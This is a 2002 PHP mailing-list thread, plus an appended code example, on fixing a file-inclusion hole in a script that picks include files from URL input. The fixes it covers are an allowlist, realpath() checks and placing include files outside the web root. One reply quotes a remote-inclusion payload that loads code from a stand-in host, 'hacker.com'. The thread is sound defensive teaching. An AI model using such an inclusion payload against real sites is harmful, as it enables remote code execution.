That still wouldn't fix anything if you're including a file based on unchecked user input.
Make an array in your file of "safe" files to include, that can be designated by the user.

    $safe_files = array("file1", "file2", "file3");
    if (isset($safe_files[$_GET['include']])) {
        include("/path/to/include/" . $safe_files[$_GET['include']] . ".php");
    }

or...

    switch ($_GET['include']) {
        case 1:
            include("file1.php");
            break;
        case 2:
            include("file2.php");
            break;
    }

You should really, really, rethink your design where you have to include files based on something passed in the url.

---John Holmes...

> -----Original Message-----
> From: John Wards [mailto:[EMAIL PROTECTED]]
> Sent: Friday, October 04, 2002 6:14 AM
> To: Stas Maximov
> Cc: PHP General
> Subject: Re: [PHP] Umm... Uh-oh
>
> ah never thought of that!
>
> John
>
> On Friday 04 Oct 2002 11:14 am, Stas Maximov wrote:
> > The easiest and safest way to get around this problem is to place all
> > your include files outside of your webroot directory (say one level up),
> > so they will be accessible locally via includes, but NOT accessible via http.
> >
> > HTH, Stas
> >
> > ----- Original Message -----
> > From: "John Wards" <[EMAIL PROTECTED]>
> > To: "PHP" <[EMAIL PROTECTED]>
> > Sent: Friday, October 04, 2002 10:58 AM
> > Subject: Re: [PHP] Umm... Uh-oh
> >
> >
> > erm......would that allow hackers access? Say I have a database include
> > file would hackers be able to get access to my database like this?
> >
> > (include('http://mysite.com/datainc.php');)
> >
> > I hope bloody not!!! if so how on earth do I get round that!
> >
> > John
> >
> > On Friday 04 Oct 2002 10:52 am, Marek Kilimajer wrote:
> > > Use realpath() to check the path. I also suspect your script is
> > > vulnerable to cross-site includes
> > > (include('http://hacker.com/script.inc');)
> > >
> > > Rick Beckman wrote:
> > > >Okay, I was mistaken... There is a gaping security hole in my simple
> > > > li'l script... How do I modify it to only accept files from a certain
> > > > path? I want the url format to be script.php?call=1 where "1" is the
> > > > called file in the /includes/ directory. Just when I get optimistic I
> > > > leave the entire system exposed. Yeah, that fits with my luck. :-)
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
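Putting the three suggestions in the thread together (John Holmes's fixed allowlist, Marek's realpath() check, and Stas's include directory outside the web root), here is an added example for Rick's script.php?call=1 case. This is not code from anyone in the thread; the INCLUDE_MAP constant, the resolve_include() function and the ../includes directory are assumptions made for the example.

```php
<?php
// Added example (not from the thread): map an opaque request key to a file
// from a fixed allowlist, then confirm with realpath() that the resolved
// file really lives inside the include directory before including it.
// The directory is assumed to sit outside the web root, as Stas suggests.

declare(strict_types=1);

// Constructed allowlist: request key => file name (without ".php").
// The user never supplies a path fragment, only a key into this map.
const INCLUDE_MAP = [
    '1'     => 'file1',
    '2'     => 'file2',
    'about' => 'about',
];

/**
 * Return the absolute path of the allowed include for $key, or null if the
 * key is not in the map or the file does not resolve inside $baseDir.
 */
function resolve_include(string $baseDir, ?string $key): ?string
{
    // Only an exact, existing key is accepted, so "1/../x" or "http://..."
    // never reaches the include path.
    if ($key === null || !array_key_exists($key, INCLUDE_MAP)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . INCLUDE_MAP[$key] . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }

    // Belt and braces: the canonical path must start with the canonical base,
    // which also catches an allowlisted file that is a symlink pointing elsewhere.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage: script.php?call=1
$includeDir = __DIR__ . '/../includes'; // one level above the web root (assumption)
$raw = $_GET['call'] ?? null;
$target = resolve_include($includeDir, is_string($raw) ? $raw : null);
if ($target === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $target;
```

Two points worth noting. First, the remote include John Wards worries about (include of an http:// URL) only works when the server lets include() use URL wrappers (allow_url_fopen in the PHP 4 era, allow_url_include in later versions); with an allowlist the request string never becomes part of the path, so it cannot become a URL in the first place. Second, the is_string() guard matters because ?call[]=1 turns $_GET['call'] into an array, which would otherwise be a type error rather than a clean 404.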